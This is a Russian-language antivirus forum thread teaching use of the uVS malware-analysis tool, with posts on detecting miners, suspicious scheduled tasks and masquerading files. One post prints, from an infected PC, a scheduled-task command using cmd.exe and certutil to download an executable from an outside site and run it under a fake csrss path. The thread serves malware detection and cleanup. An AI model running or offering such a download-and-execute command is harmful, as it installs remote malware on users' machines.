uVS как стать опытными пользователем этой программы. , Обучение пользования программой uVS

RSS

Сообщений: 19

Баллов: 9

Регистрация: 09.03.2020

Размещено 09.03.2020 22:12:52

Добрый день. Недавно столкнулся с одним сильным вирусом майнером, который блокировал установку антивируса Nod32. Благодаря теме на форуме в разделе:установка антивируса, мне помогли решить эту проблему с помощью программы uVS, скидывая скрипты и инструкции пошаговоые. Хотелось бы самому разобраться в этой программе и как ней пользоваться, подробнее прочитать что делает каждый ее раздел. Буду рад любому ответу по поводу этой программы!) Всем добра)

Ответы

Пред. 1 2 3 4 5 6

Сообщений: 6239

Баллов: 4991

Регистрация: 25.05.2010

Размещено 30.01.2021 11:45:25

Вредоносный сайт\ресурс который антивирус ESET определяет, как: " Обнаружена атака путем подделки записей кэша ARP "
Как это выглядит в UVS.

Код
HTTPS://BESTBLUES.TECH/APP/APP.EXE C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE

Программа показывает два объекта.
Первый это ссылка на исполняемый файл. ( что само по себе подозрительно :)
Второй путь до директории: APPDATA с нелепой маскировкой под системный C:\Windows\System32\csrss.exe
и не менее "интеллектуальной" маскировкой SCHEDULED.EXE SCHEDULED~~.EXE~~ планировщик...
------------
В развёрнутом виде это:

Код
Полное имя HTTPS://BESTBLUES.TECH/APP/APP.EXE Имя файла HTTPS://BESTBLUES.TECH/APP/APP.EXE Тек. статус ПОДОЗРИТЕЛЬНЫЙ Сохраненная информация на момент создания образа Статус Доп. информация на момент обновления списка Файл C:\WINDOWS\SYSTEM32\CMD.EXE Ссылки на объект Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340 Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\

Код

Полное имя                  HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла                   HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус                   ПОДОЗРИТЕЛЬНЫЙ 
               
Сохраненная информация      на момент создания образа
Статус                      
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\

Код
Полное имя C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE Имя файла SCHEDULED.EXE Тек. статус ПОДОЗРИТЕЛЬНЫЙ Сохраненная информация на момент создания образа Статус ПОДОЗРИТЕЛЬНЫЙ Инф. о файле Не удается найти указанный файл. Цифр. подпись проверка не производилась Статус ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ Путь до файла Типичен для вирусов и троянов Доп. информация на момент обновления списка Файл C:\WINDOWS\SYSTEM32\CMD.EXE Ссылки на объект Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340 Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340 Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\

Код

Полное имя                  C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
Имя файла                   SCHEDULED.EXE
Тек. статус                  ПОДОЗРИТЕЛЬНЫЙ 
                                                       
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ 
Инф. о файле                Не удается найти указанный файл. 
Цифр. подпись               проверка не производилась
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла               Типичен для вирусов и троянов
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\

Подозрительные моменты: Temp; AppData; TaskCache; Csrss и т.д.
Из интересного задействован системный: C:\WINDOWS\SYSTEM32\CERTUTIL.EXE
*Certutil.exe — это программа командной строки, которая устанавливается как часть служб сертификации.
Проверка ссылки на V.T.: https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc86511a0e4e00248a/detection

Прикрепленные файлы

пп7в.jpg (92.27 КБ)

Изменено: RP55 RP55 - 30.01.2021 11:58:43

Сообщений: 6239

Баллов: 4991

Регистрация: 25.05.2010

Размещено 02.12.2021 16:35:29

...
Просмотр активности процессов и сетевой активности.

Если есть проблемы со скоростью...

Можно замерить скорость когда система работает в безопасном режиме. Например здесь: https://yandex.ru/internet/
Загружаемся в безопасном режиме и проверяем = сравниваем.
+ Учитываем - что если включено обновление системы - то...

Прикрепленные файлы

77-88-00.jpg (103.48 КБ)

мон 2.jpg (41.51 КБ)

33-44-55.jpg (102.36 КБ)

Изменено: RP55 RP55 - 17.09.2022 14:53:04

Сообщений: 6239

Баллов: 4991

Регистрация: 25.05.2010

Размещено 17.08.2022 18:52:13

Сейчас часто используют легальные файлы для "атаки"
Как правило это чистые файлы - но устаревшие. Например стоит современная\актуальная\обновлённая версия программы. Но ей подсовывают старый файл этой же программы ( со множеством узявимостей ) - которые и эксплуатируются.

Или есть некий старый скрипт... который всю свою сознательную :) жизнь был чист. Он обращался к некому сайту... Но теперь у сайта другой владелец, или сайт был взломан.
-----
Как выявить ? Как правило работают с самыми популярными ( ежедневно используемыми на PC программами ) Браузеры и т.д.
Каталог\папка с этим старым дополнением будет рядом с этой программой. В том же каталоге или рядом. Большая разница по времени между созданием\изменением файла\файлов.
Например в каталоге с файлами 2022 года файл 2010.
Если есть сомнение можно файл на время переименовать. Например с updater.dll в updater.dll111
Чаще всего эти компоненты являются библиотеками\программными дополнениями или скриптами.
Так как файл чист - то и расширение файла - как правило стандартное.
-----
Если объектов в системе слишком много - переименовать\удалить всё, что не влияет на работу системы. Всё лишнее.
+
Возможно файл запускается через задачу, или автозапуск.

Изменено: RP55 RP55 - 18.08.2022 00:11:30

Сообщений: 6239

Баллов: 4991

Регистрация: 25.05.2010

Размещено 02.01.2023 16:40:31

Однозначно - даже не к подозрительным, к вирусом относятся объекты которые 5; 10; 25 раз прописаны в задачах на запуск.
" Слава" "Выдающимся" Создателям ... ( сего чуда )

Ссылки на объект
Ссылка C:\WINDOWS\SYSTEM32\TASKS\ACTIVATIONRULE

Ссылка C:\WINDOWS\SYSTEM32\TASKS\Agent Activation Runtime\AGENT ACTIVATION RUNTIMESERVICES_BK796

Ссылка C:\WINDOWS\SYSTEM32\TASKS\AntiMalwareSericeExecutable\ANTIMALWARESERICEEXECUTABLESERVICES_BK656

Ссылка C:\WINDOWS\SYSTEM32\TASKS\ANTIMALWARESERVICEEXECUTABLE

Ссылка C:\WINDOWS\SYSTEM32\TASKS\MICROSOFTEDGEUPD

Ссылка C:\WINDOWS\SYSTEM32\TASKS\MicrosoftUpdateServices\MICROSOFTUPDATESERVICESSERVICES_BK885

и т.д.

Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{07E64826-A11E-4A4A-853B-672E88D38A14}\Actions
Actions "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"

Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{07E64826-A11E-4A4A-853B-672E88D38A14}\
Task \Agent Activation Runtime\Agent Activation RuntimeServices_bk796

Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1137A4FF-839D-41ED-B7A2-DC5ECBB3509B}\Actions
Actions "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"

Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1137A4FF-839D-41ED-B7A2-DC5ECBB3509B}\
Task \MicrosoftEdgeUpd

Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1773D39D-4B62-4382-BA67-4D6A44256D80}\Actions
Actions "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"

и т.д.

Сообщений: 6239

Баллов: 4991

Регистрация: 25.05.2010

Размещено 05.01.2023 16:33:57

Выявление и Удаление JS/Yandex

Например Антивирус выдаёт оповещение - как на снимке.

Открываем uVS и через поиск находим все записи типа: CLIENTS2.GOOGLE

и удаляем.

Прикрепленные файлы

Скрин1.JPG (101.46 КБ)

Изменено: RP55 RP55 - 05.01.2023 16:38:28

Сообщений: 6239

Баллов: 4991

Регистрация: 25.05.2010

Размещено 08.02.2023 10:48:03

Пример обнаружения антивирусом и лечения системы
https://forum.esetnod32.ru/messages/forum9/topic17114/message115359/#message115359

Сообщений: 6239

Баллов: 4991

Регистрация: 25.05.2010

Размещено 10.10.2023 16:25:53

Можно найти угрозы проверяя записи защитника Windows - файлы в исключениях.
Сейчас часто можно увидеть такое ( как на фото )

---------
! Маскировка под блокировщик рекламы: Adblock.xpi в Adblock.exe
---------

Прикрепленные файлы

1607963082071-1990362701.thumb.jpg.fce65d13df469559a736960ab2de447a.jpg (89.08 КБ)

Изменено: RP55 RP55 - 14.03.2024 16:22:56

Пред. 1 2 3 4 5 6